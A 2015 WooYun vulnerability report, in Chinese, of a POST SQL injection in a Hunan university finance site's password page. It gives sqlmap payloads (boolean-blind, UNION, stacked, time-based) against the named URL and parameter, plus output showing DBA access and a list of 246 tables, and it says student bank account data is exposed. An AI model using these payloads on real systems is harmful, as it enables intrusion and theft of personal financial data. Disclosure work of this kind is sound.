当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-091170

漏洞标题:湖南科技大学财务网存在post型注入

相关厂商:湖南科技大学

漏洞作者: 路人甲

提交时间:2015-01-13 14:49

修复时间:2015-01-18 14:50

公开时间:2015-01-18 14:50

漏洞类型:系统/服务运维配置不当

危害等级:中

自评Rank:10

漏洞状态:已交由第三方合作机构(CCERT教育网应急响应组)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-13: 细节已通知厂商并且等待厂商处理中
2015-01-18: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

‘sa’权限不忍直视了。学生信息,和银行账号信息都有啊!!(-__-)

详细说明:

页面:http://cwc.hnust.cn/pay/getpass.asp

1.jpg


加个' 提交 ,出错了

1.jpg


抓包:

1.jpg


提交的数据可以看到了。
直接sqlmap。

漏洞证明:

Parameter: username (POST)
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: username=1212020202' AND 7443=7443 AND 'yDal'='yDal
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: username=-9863' UNION ALL SELECT CHAR(113)+CHAR(106)+CHAR(113)+CHAR
(113)+CHAR(113)+CHAR(87)+CHAR(97)+CHAR(119)+CHAR(82)+CHAR(87)+CHAR(69)+CHAR(104)
+CHAR(122)+CHAR(73)+CHAR(107)+CHAR(113)+CHAR(113)+CHAR(112)+CHAR(113)+CHAR(113),
NULL--
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries
Payload: username=1212020202'; WAITFOR DELAY '0:0:5'--
Type: AND/OR time-based blind
Title: Microsoft SQL Server/Sybase time-based blind
Payload: username=1212020202' WAITFOR DELAY '0:0:5'--
---
[03:48:13] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, ASP
back-end DBMS: Microsoft SQL Server 2000
[03:48:13] [INFO] testing if current user is DBA
current user is DBA: True
[03:48:13] [WARNING] HTTP error codes detected during run:
404 (Not Found) - 1 times
[03:48:13] [INFO] fetched data logged to text files under 'C:\Users\ERIC\.sqlmap
\output\cwc.hnust.cn'


还是dba

[03:53:04] [INFO] testing if current user is DBA
current user is DBA: True


再看了下有多少库

1.jpg


随便找个库就有 250个表了

Database: xssf5
[246 tables]
+--------------------+
| DM_UF_MX |
| DM_UF_MX |
| FS_RECORD |
| LX_DM |
| LX_SFB1 |
| LX_SFB1 |
| LX_SFMX |
| PBJDM |
| PBJSFBZ |
| PBMDM |
| PCXKC |
| PDJBH |
| PDKLX |
| PDWDY |
| PDWLXDM |
| PDWSJX |
| PEXPORT_LM |
| PEXPORT_LM |
| PFSSFXM |
| PFXDM |
| PGNDM |
| PGSDY |
| PIMPORT_LM |
| PIMPORT_LM |
| PJSFSDM |
| PJ_LYB |
| PJ_MXB |
| PKCDM |
| PMKDM |
| PMZDM |
| PQUERY_FIELD_TMP |
| PQUERY_FIELD_TMP |
| PQUERY_FIELD_TMP |
| PQUERY_TABLE |
| PQUERY_TJ |
| PQUERY_TMP |
| PQXDM_FX |
| PQXDM_FX |
| PSCWJDY |
| PSFQJDZ |
| PSFQJDZ |
| PSFXMLX |
| PSFXMLX |
| PSFYXJ |
| PTXXX |
| PXQDM |
| PXSDM_BAK |
| PXSDM_BAK |
| PXSLB |
| PXSLY |
| PXSSFBZ_MX |
| PXSSFBZ_MX |
| PXSTZ_MX |
| PXSXZ |
| PXSZT |
| PXTCS |
| PXXXX |
| PYHCWDM |
| PYHDM |
| PYHSSZ |
| PYHZDM |
| PYSKZY |
| PYYDM |
| PZBLM |
| PZCBZB |
| PZJLB |
| PZYDM |
| PZYLXDM |
| SF_BBDY_MX |
| SF_BBDY_MX |
| SF_CESFDB |
| SF_CESFDMX |
| SF_CXFB |
| SF_CXFMX |
| SF_DJGL |
| SF_HJDB_DEL |
| SF_HJDB_DEL |
| SF_HJDMX_DEL |
| SF_HJDMX_DEL |
| SF_JMDB_BAK |
| SF_JMDB_BAK |
| SF_JMDB_DEL |
| SF_JMDMX_BAK |
| SF_JMDMX_BAK |
| SF_JMDMX_DEL |
| SF_LOG |
| SF_PZMB1 |
| SF_PZMB1 |
| SF_PZMBGS |
| SF_PZMBMX |
| SF_QYB |
| SF_SFDB_BAK |
| SF_SFDB_BAK |
| SF_SFDB_DEL |
| SF_SFDB_RY |
| SF_SFDDC |
| SF_SFDMX_BAK |
| SF_SFDMX_BAK |
| SF_SFDMX_DEL |
| SF_SFDMX_DY |
| SF_SFDMX_RY |
| SF_SFDY_LOG |
| SF_SFD_DY |
| SF_SFD_FP |
| SF_SSDK_PL |
| SF_SSDK_PL |
| SF_SSDK_QY |
| SF_SS_YH |
| SF_TFDB_BAK |
| SF_TFDB_BAK |
| SF_TFDB_DEL |
| SF_TFDDC |
| SF_TFDMX_BAK |
| SF_TFDMX_BAK |
| SF_TFDMX_DEL |
| SF_TFD_FP |
| SF_XESFDB |
| SF_XESFDMX |
| SF_XXDL |
| SF_YHDS_LSH |
| SF_YHDS_TKB |
| SF_YHDS_XF |
| SF_YSKBZ |
| SF_YSKTZ_MX_BAK |
| SF_YSKTZ_MX_BAK |
| SF_YSK_BAK |
| SF_YSK_BAK |
| SF_YSK_CD |
| SF_YSK_DK |
| SF_YSK_FP |
| SF_YSK_TMP |
| SF_ZXDKBZ |
| SF_ZZ_BAK |
| SF_ZZ_BAK |
| T_zs_ylpos_tmp |
| T_zs_ylpos_tmp |
| V_CXFXS |
| V_CXMXZ |
| V_HJMXZ |
| V_JMD |
| V_JMDXS |
| V_JMLXMXZ |
| V_JMLXXS |
| V_JMMXZ_LS |
| V_JMMXZ_LS |
| V_SFD |
| V_SFDXS |
| V_SFLXMXZ_LS |
| V_SFLXMXZ_LS |
| V_SFLXXS |
| V_SFLXZZ |
| V_SFLXZZXS |
| V_SFMXZ_LS |
| V_SFMXZ_LS |
| V_SFZZ |
| V_SFZZXS |
| V_TABLE |
| V_TFD |
| V_TFDXS |
| V_TFLXMXZ |
| V_TFLXXS |
| V_TFMXZ_LS |
| V_TFMXZ_LS |
| V_XESFLXMXZ |
| V_XESFMXZ |
| V_XSDM |
| V_YSKLX |
| V_YSKLX |
| V_YSKLXXS |
| V_YSKXS |
| V_jfxxb |
| WY_SSDK |
| XF_XFGL_TMP |
| XF_XFGL_TMP |
| ckd_xyp |
| dtproperties |
| gs_table |
| nfsf2_bjdmzs |
| nfsf2_pjnmb |
| nfsf2_plog |
| nfsf2_pxtcs |
| nfsf2_vzz |
| nfsf2_xsdmzs |
| nfsf_vsfzz |
| pjgl_glb |
| pjgl_lyb |
| pjgl_mxb |
| seed |
| sf_jks_temp |
| sf_jsfsb |
| sf_jzhj |
| sf_pkyh |
| sf_poslog |
| sf_qfqk_htemp1 |
| sf_sgpjzhj |
| sf_sqltj |
| sf_xtrz |
| sf_yhpk_ls |
| sf_yhpk_mx |
| sf_yhpk_temp |
| sf_yhyjfk |
| sysconstraints |
| syssegments |
| sysxszdkz |
| t_zs_czwh |
| t_zs_dlyhwh |
| t_zs_dtwh |
| t_zs_dwdz |
| t_zs_dwpjgj |
| t_zs_dwxmgj |
| t_zs_ggb |
| t_zs_jzhjxx |
| t_zs_pjkpxx |
| t_zs_pjls_tmp |
| t_zs_pjls_tmp |
| t_zs_pjwh |
| t_zs_pjzl |
| t_zs_srlb |
| t_zs_xmxx |
| t_zs_ypsq |
| t_zs_zgwh |
| t_zs_zsdw |
| temp_bmbjxztjb_xyp |
| temp_bmjfqkb_xyp |
| temp_bmrshzb_xyp |
| temp_sfqkzhtjb_xyp |
| temp_xsysfhzb_xyp |
| tmp_jq |
| txs13 |
| tzf14 |
| tzj14 |
| tzs |
| v_cxfzz |
| wy_bank |
| wy_bwjg |
| wy_bwlx |
| wy_bwlxzddy |
| wy_fs |
| wy_js |
| wy_pagid |
| wy_xxdl |
| wy_yh_xtcs |
| xe_mxz |
| xe_sfzz |
| xe_zh |
| 客户编号
+--------------------+



由于表名都是拼音缩写不好辨认,就随便试了几张表
学号 银行账号姓名...数量很大,从05年到现在几乎都有

1.jpg


脱裤的就不感兴趣了~,走人!

修复方案:

过滤。

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-01-18 14:50

厂商回复:

最新状态:

暂无


漏洞评价:

评论